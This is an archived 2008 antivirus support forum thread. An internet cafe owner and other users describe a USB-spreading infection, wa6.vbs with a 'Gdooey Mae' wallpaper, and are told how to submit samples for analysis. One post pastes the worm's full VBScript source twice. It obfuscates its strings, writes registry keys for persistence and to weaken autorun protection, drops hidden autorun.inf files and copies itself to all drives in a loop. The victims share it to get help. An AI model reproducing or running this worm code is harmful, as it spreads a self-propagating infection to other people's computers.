no one anti virus can find them
redj
Full Version: new viruses???
hello helmut
i'm redj. i live in sihanoukville, Cambodia. I'm french.
thank you for answering
so weird ,
my friend just typed the name of these animals on "google" and i found my messages.
i'm on tv eeeeeee!
seriously
your indications seem difficult for me
and
you only ask for one.
i have two of them
and i GUESS they go to cameras and mobile phone but i'm not Very sure of that.
but they go to usb FOR SURE.
lately, i had some US hi school student looking for development in cambodia ( and some other customers
from all over the world) put their usb keys in my computers SPREADING these sicknesses
you're gonna get it in the States, my friend, for sure!
i have:
va6.vbs:
i double click on a drive and it says: can not find script file "c:\wa6.vbs"
because i deleted it but it's not deleted 'cause i still can find it with "hidden files"
and
"Gdooey Mae.bmp":
is all over sihanoukville, Cambodia, may be phnom penh ?????? i don't know for sure!
when i open internet explorer i read on the upper blue part :
internet explorer Gdooey mae
and : blank page-Gdooey mae
and: what ever address GdooeyMae
i deleted it but it comes back.
one of those two erases the picture on the desktop
i even can find it in my : music folder, picture desktop, usb keys, camera memory sticks.
as i presented myself as a small business ( i have 4 computers and hoping to get 2 more),
your free trial 7.0 is always stopping the customers' actions when they go to "mozilla " and "explorer"
(although i erased the short cut to explorer because it's written : Gdooey mae")
and out of ignorance they don't know what to click so they clickwhat ever's gonna give
them their windows back and IF they can't do so they leave angry because all the other computers are full
of customers
or
i give them another computer with free "avast" and they CAN take care of their business because it doesn't disturb their action
yes, their action
i mean your anti virus can detect the action of the virus.
i check "details" :but i'm kind of moron, if you see what i mean...
i'm annoyed
because some "ex pats" and tourists check their bank account.
some play poker with real money...
on the internet.
as well,
my french degreed technician did install:
panda, uni..., avg, and ??? and kaspersky
he tried to install 4 of them .. (that a UK engish teacher friend of mine put in a usb key to help me get rid of this poop.)
not a single anti virus can destroy them.
yours as well
i delete them but they come back
i'm writting this letter and i read on your "kaspersky lab" window
"insert special item"
can i click and drag??????
if you'd like more informations, please, let me know.
sincerly thankfull
redj
i'm redj. i live in sihanoukville, Cambodia. I'm french.
thank you for answering
so weird ,
my friend just typed the name of these animals on "google" and i found my messages.
i'm on tv eeeeeee!
seriously
your indications seem difficult for me
and
you only ask for one.
i have two of them
and i GUESS they go to cameras and mobile phone but i'm not Very sure of that.
but they go to usb FOR SURE.
lately, i had some US hi school student looking for development in cambodia ( and some other customers
from all over the world) put their usb keys in my computers SPREADING these sicknesses
you're gonna get it in the States, my friend, for sure!
i have:
va6.vbs:
i double click on a drive and it says: can not find script file "c:\wa6.vbs"
because i deleted it but it's not deleted 'cause i still can find it with "hidden files"
and
"Gdooey Mae.bmp":
is all over sihanoukville, Cambodia, may be phnom penh ?????? i don't know for sure!
when i open internet explorer i read on the upper blue part :
internet explorer Gdooey mae
and : blank page-Gdooey mae
and: what ever address GdooeyMae
i deleted it but it comes back.
one of those two erases the picture on the desktop
i even can find it in my : music folder, picture desktop, usb keys, camera memory sticks.
as i presented myself as a small business ( i have 4 computers and hoping to get 2 more),
your free trial 7.0 is always stopping the customers' actions when they go to "mozilla " and "explorer"
(although i erased the short cut to explorer because it's written : Gdooey mae")
and out of ignorance they don't know what to click so they clickwhat ever's gonna give
them their windows back and IF they can't do so they leave angry because all the other computers are full
of customers
or
i give them another computer with free "avast" and they CAN take care of their business because it doesn't disturb their action
yes, their action
i mean your anti virus can detect the action of the virus.
i check "details" :but i'm kind of moron, if you see what i mean...
i'm annoyed
because some "ex pats" and tourists check their bank account.
some play poker with real money...
on the internet.
as well,
my french degreed technician did install:
panda, uni..., avg, and ??? and kaspersky
he tried to install 4 of them .. (that a UK engish teacher friend of mine put in a usb key to help me get rid of this poop.)
not a single anti virus can destroy them.
yours as well
i delete them but they come back
i'm writting this letter and i read on your "kaspersky lab" window
"insert special item"
can i click and drag??????
if you'd like more informations, please, let me know.
sincerly thankfull
redj
QUOTE(Helmut @ 7.08.2008 15:21) 
so you did receive my mail
it's kind of so difficult to send messages. i'm trying for quite a few time to figure out how to send you my answer and i can't tell if i did so.
then i close everything, start all over again and it seems all my mails have been sent
oooohhhhh what a head ache
redj
yes yes i have to do some thing before
let me check it out....
it's kind of so difficult to send messages. i'm trying for quite a few time to figure out how to send you my answer and i can't tell if i did so.
then i close everything, start all over again and it seems all my mails have been sent
oooohhhhh what a head ache
redj
yes yes i have to do some thing before
let me check it out....
hello helmut
i did what you told me.
when i click "send" it opens: office access 2007
on the upper blue part it says: message not sent and i don't know where to click to send it
but on the page it's written:
the file will be sent to kaspersky lab for analysis
do i close the window?
so...
did you receive them
redj
i did what you told me.
when i click "send" it opens: office access 2007
on the upper blue part it says: message not sent and i don't know where to click to send it
but on the page it's written:
the file will be sent to kaspersky lab for analysis
do i close the window?
so...
did you receive them
redj
QUOTE(redj @ 8.08.2008 11:10)
hello helmut
i did what you told me.
when i click "send" it opens: office access 2007
on the upper blue part it says: message not sent and i don't know where to click to send it
but on the page it's written:
the file will be sent to kaspersky lab for analysis
do i close the window?
so...
did you receive them
redj
i did what you told me.
when i click "send" it opens: office access 2007
on the upper blue part it says: message not sent and i don't know where to click to send it
but on the page it's written:
the file will be sent to kaspersky lab for analysis
do i close the window?
so...
did you receive them
redj
hello redj
am i correctly assuming that you run an internet cafe or guesthouse or similar the way you are describing your situation with 4 computers and soon 2 more with customers using their sticks?
and secondly, since neither your uk teacher nor the french techie found a solution so far, how urgent is your issue?
and last but not least, since almost nothing comes for free on this planet, would you be prepared to pay for onsite support? I may have some interesting solutions for you which would make you save a lot of money in the future, let alone the headaches...
let me know
onestepahead
hello 1step ahead
did you receive the viruses? that is my headache, how could i send them.
yes i have a bar internet
last night a russian came and show me a wa6.vbs on his laptop
the urgency is only that every morning i have to redo the picture on the desktop
what's important for me is the customers' privacy.
the customers are disturbed by kaspersky's actions but not on a computer with avast
now, i live in sihanoukville, Cambodia.
it's impossible to find non pirate programs.
those who have originals are coming from europe, states n others they brought with them.
and the computers are clones certainly chinese. the quality seems like it....
because the kampucheans are really poor. sincerly.
70% +, up to 90% in the country side of analphabets with an average of 30$ of
monthly wages.
where it's getting complicated is that
i do not have a credit card
the customers use skype only from computers to computers unless
they've got their own account because i don't have a credit card
so
everybody is looking for free antivirus downloads!
that's the solution my friends are looking for.
sorry for disappointing you.
it's pretty archaic down here.
and if you wanna become millionaire in cambodia you need to come as a billionaire
the ex pat community doesn't make much money.
what does :bb; means? the yellow faces may be???
did you receive the viruses?
please answer me
thanks
redj
did you receive the viruses? that is my headache, how could i send them.
yes i have a bar internet
last night a russian came and show me a wa6.vbs on his laptop
the urgency is only that every morning i have to redo the picture on the desktop
what's important for me is the customers' privacy.
the customers are disturbed by kaspersky's actions but not on a computer with avast
now, i live in sihanoukville, Cambodia.
it's impossible to find non pirate programs.
those who have originals are coming from europe, states n others they brought with them.
and the computers are clones certainly chinese. the quality seems like it....
because the kampucheans are really poor. sincerly.
70% +, up to 90% in the country side of analphabets with an average of 30$ of
monthly wages.
where it's getting complicated is that
i do not have a credit card
the customers use skype only from computers to computers unless
they've got their own account because i don't have a credit card
so
everybody is looking for free antivirus downloads!
that's the solution my friends are looking for.
sorry for disappointing you.
it's pretty archaic down here.
and if you wanna become millionaire in cambodia you need to come as a billionaire
the ex pat community doesn't make much money.
what does :bb;
means? the yellow faces may be???did you receive the viruses?
please answer me
thanks
redj
QUOTE(onestepahead @ 9.08.2008 15:31)
hello redj
am i correctly assuming that you run an internet cafe or guesthouse or similar the way you are describing your situation with 4 computers and soon 2 more with customers using their sticks?
and secondly, since neither your uk teacher nor the french techie found a solution so far, how urgent is your issue?
and last but not least, since almost nothing comes for free on this planet, would you be prepared to pay for onsite support? I may have some interesting solutions for you which would make you save a lot of money in the future, let alone the headaches...
let me know
onestepahead
am i correctly assuming that you run an internet cafe or guesthouse or similar the way you are describing your situation with 4 computers and soon 2 more with customers using their sticks?
and secondly, since neither your uk teacher nor the french techie found a solution so far, how urgent is your issue?
and last but not least, since almost nothing comes for free on this planet, would you be prepared to pay for onsite support? I may have some interesting solutions for you which would make you save a lot of money in the future, let alone the headaches...
let me know
onestepahead
1) Put the suspected virus in a password-protected zip or rar file.
2) Compose an email message (behavior of that virus) and attach the zip file.
3) Include the password in the body/subject of the email.
4) Send the zip/rar file to newvirus@kaspersky.com
or
see this FAQ
2) Compose an email message (behavior of that virus) and attach the zip file.
3) Include the password in the body/subject of the email.
4) Send the zip/rar file to newvirus@kaspersky.com
or
see this FAQ
Hai, My real name is Sebastian, from Indonesia.
My notebook and my computer infected by this visual basic script, too.
wa6.vbs is the name, i don't know where its come from, but maybe I can send a little help:
When I convert wa6.vbs to pdf, this is what I got:
Thats all I can do, I still need help to resolve this "new virus"
Oya, the other effect are:
1. The background picture become white (for vista) and it's become blue (in XP)
2. I made "autorun.inf" my self. When wa6 infected, its gone. But, when I create another one with same name,
my vista need to rename to autorun(2).inf, because that file already exist. Until now, I can't create my autorun again.
Thanks very much...
And sorry for my bad English...
My notebook and my computer infected by this visual basic script, too.
wa6.vbs is the name, i don't know where its come from, but maybe I can send a little help:
When I convert wa6.vbs to pdf, this is what I got:
CODE
option explicit
on error resume next
dim i
dim fso, rg, drv, tf
dim fileToCopy
dim destinationPath
dim sourcePath, sourcedrv
dim str, out
dim r1, r2, r3
dim art, art1, art2, art3
dim tot, pol
dim wp, gm, zp
art1 = "[`tsnqtm-hme"
conv art1
art2 = "Z`tsnqtm\"
conv art2
art3 = "rgdkkdwdbtsd<vrbqhos-dwd v`5-uar"
conv art3
wp= "B9[fcl`d-alo"
conv wp
gm= "Fcnndx L`d"
conv gm
zp= "vrbqhos-dwd .D9uar B9[`tsndwdb-a`s"
conv zp
art = art2 & vbcrlf & art3
r1= "GJBT[Rnesv`qd[Lhbqnrnes[Vhmcnvr Rbqhoshmf Gnrs[Rdsshmfr[Shldnts"
conv r1
r2=
"GJBT[Rnesv`qd[Lhbqnrnes[Vhmcnvr[BtqqdmsUdqrhnm[Onkhbhdr[Dwoknqdq[MnCqhudSxod@tsnQtm
"
conv r2
r3= "GJKL[Rnesv`qd[Lhbqnrnes[Vhmcnvr[BtqqdmsUdqrhnm[Qtm[Yho"
conv r3
set fso = CreateObject("Scripting.FileSystemObject")
set sourcePath = fso.getfile(Wscript.ScriptFullname)
sourcedrv = left(sourcePath,3)
set rg = createobject("WScript.Shell")
rg.regwrite "HKCU\Software\Microsoft\Internet Explorer\Main\Window Title", gm
rg.regwrite "HKCU\Control Panel\Desktop\Wallpaper" ,wp
rg.regwrite r1, 0
rg.regwrite r2, 0,"REG_DWORD"
rg.regwrite r3, zp
do until 1=0
for each drv in fso.drives
If (drv.drivetype=1 or drv.drivetype=2) and drv.path <> "A:" then
set tf =fso.getfile(drv.path & art1)
tf.attributes =32
set tf=fso.createtextfile(drv.path & art1, 2, true)
tf.write art
tf.close
set tf =fso.getfile(drv.path & art1)
tf.attributes=39
fileToCopy= sourcedrv & "wa6.vbs"
destinationPath = drv.path & "\wa6.vbs"
fso.CopyFile fileToCopy, destinationPath
destinationPath = "C:\autoexec.bat"
fso.CopyFile fileToCopy, destinationPath, true
fileToCopy= sourcedrv & "gdmae.bmp"
destinationPath = drv.path & "\gdmae.bmp"
fso.CopyFile fileToCopy, destinationPath
end if
next
Wscript.sleep 100000
loop
Function conv (str)
out=""
For i=1 to len(str)
out=out + chr(Asc(Mid(str, i, 1)) + 1)
Next
str= out
End function
on error resume next
dim i
dim fso, rg, drv, tf
dim fileToCopy
dim destinationPath
dim sourcePath, sourcedrv
dim str, out
dim r1, r2, r3
dim art, art1, art2, art3
dim tot, pol
dim wp, gm, zp
art1 = "[`tsnqtm-hme"
conv art1
art2 = "Z`tsnqtm\"
conv art2
art3 = "rgdkkdwdbtsd<vrbqhos-dwd v`5-uar"
conv art3
wp= "B9[fcl`d-alo"
conv wp
gm= "Fcnndx L`d"
conv gm
zp= "vrbqhos-dwd .D9uar B9[`tsndwdb-a`s"
conv zp
art = art2 & vbcrlf & art3
r1= "GJBT[Rnesv`qd[Lhbqnrnes[Vhmcnvr Rbqhoshmf Gnrs[Rdsshmfr[Shldnts"
conv r1
r2=
"GJBT[Rnesv`qd[Lhbqnrnes[Vhmcnvr[BtqqdmsUdqrhnm[Onkhbhdr[Dwoknqdq[MnCqhudSxod@tsnQtm
"
conv r2
r3= "GJKL[Rnesv`qd[Lhbqnrnes[Vhmcnvr[BtqqdmsUdqrhnm[Qtm[Yho"
conv r3
set fso = CreateObject("Scripting.FileSystemObject")
set sourcePath = fso.getfile(Wscript.ScriptFullname)
sourcedrv = left(sourcePath,3)
set rg = createobject("WScript.Shell")
rg.regwrite "HKCU\Software\Microsoft\Internet Explorer\Main\Window Title", gm
rg.regwrite "HKCU\Control Panel\Desktop\Wallpaper" ,wp
rg.regwrite r1, 0
rg.regwrite r2, 0,"REG_DWORD"
rg.regwrite r3, zp
do until 1=0
for each drv in fso.drives
If (drv.drivetype=1 or drv.drivetype=2) and drv.path <> "A:" then
set tf =fso.getfile(drv.path & art1)
tf.attributes =32
set tf=fso.createtextfile(drv.path & art1, 2, true)
tf.write art
tf.close
set tf =fso.getfile(drv.path & art1)
tf.attributes=39
fileToCopy= sourcedrv & "wa6.vbs"
destinationPath = drv.path & "\wa6.vbs"
fso.CopyFile fileToCopy, destinationPath
destinationPath = "C:\autoexec.bat"
fso.CopyFile fileToCopy, destinationPath, true
fileToCopy= sourcedrv & "gdmae.bmp"
destinationPath = drv.path & "\gdmae.bmp"
fso.CopyFile fileToCopy, destinationPath
end if
next
Wscript.sleep 100000
loop
Function conv (str)
out=""
For i=1 to len(str)
out=out + chr(Asc(Mid(str, i, 1)) + 1)
Next
str= out
End function
Thats all I can do, I still need help to resolve this "new virus"
Oya, the other effect are:
1. The background picture become white (for vista) and it's become blue (in XP)
2. I made "autorun.inf" my self. When wa6 infected, its gone. But, when I create another one with same name,
my vista need to rename to autorun(2).inf, because that file already exist. Until now, I can't create my autorun again.
Thanks very much...
And sorry for my bad English...
Hello,
Have you read this post:
What's the result from virus analyst ?
Have you read this post:
QUOTE(wicked @ 11.08.2008 10:04)
1) Put the suspected virus in a password-protected zip or rar file.
2) Compose an email message (behavior of that virus) and attach the zip file.
3) Include the password in the body/subject of the email.
4) Send the zip/rar file to newvirus@kaspersky.com
or
see this FAQ
2) Compose an email message (behavior of that virus) and attach the zip file.
3) Include the password in the body/subject of the email.
4) Send the zip/rar file to newvirus@kaspersky.com
or
see this FAQ
What's the result from virus analyst ?
This is a "lo-fi" version of our main content. To view the full version with more information, formatting and images, please click here.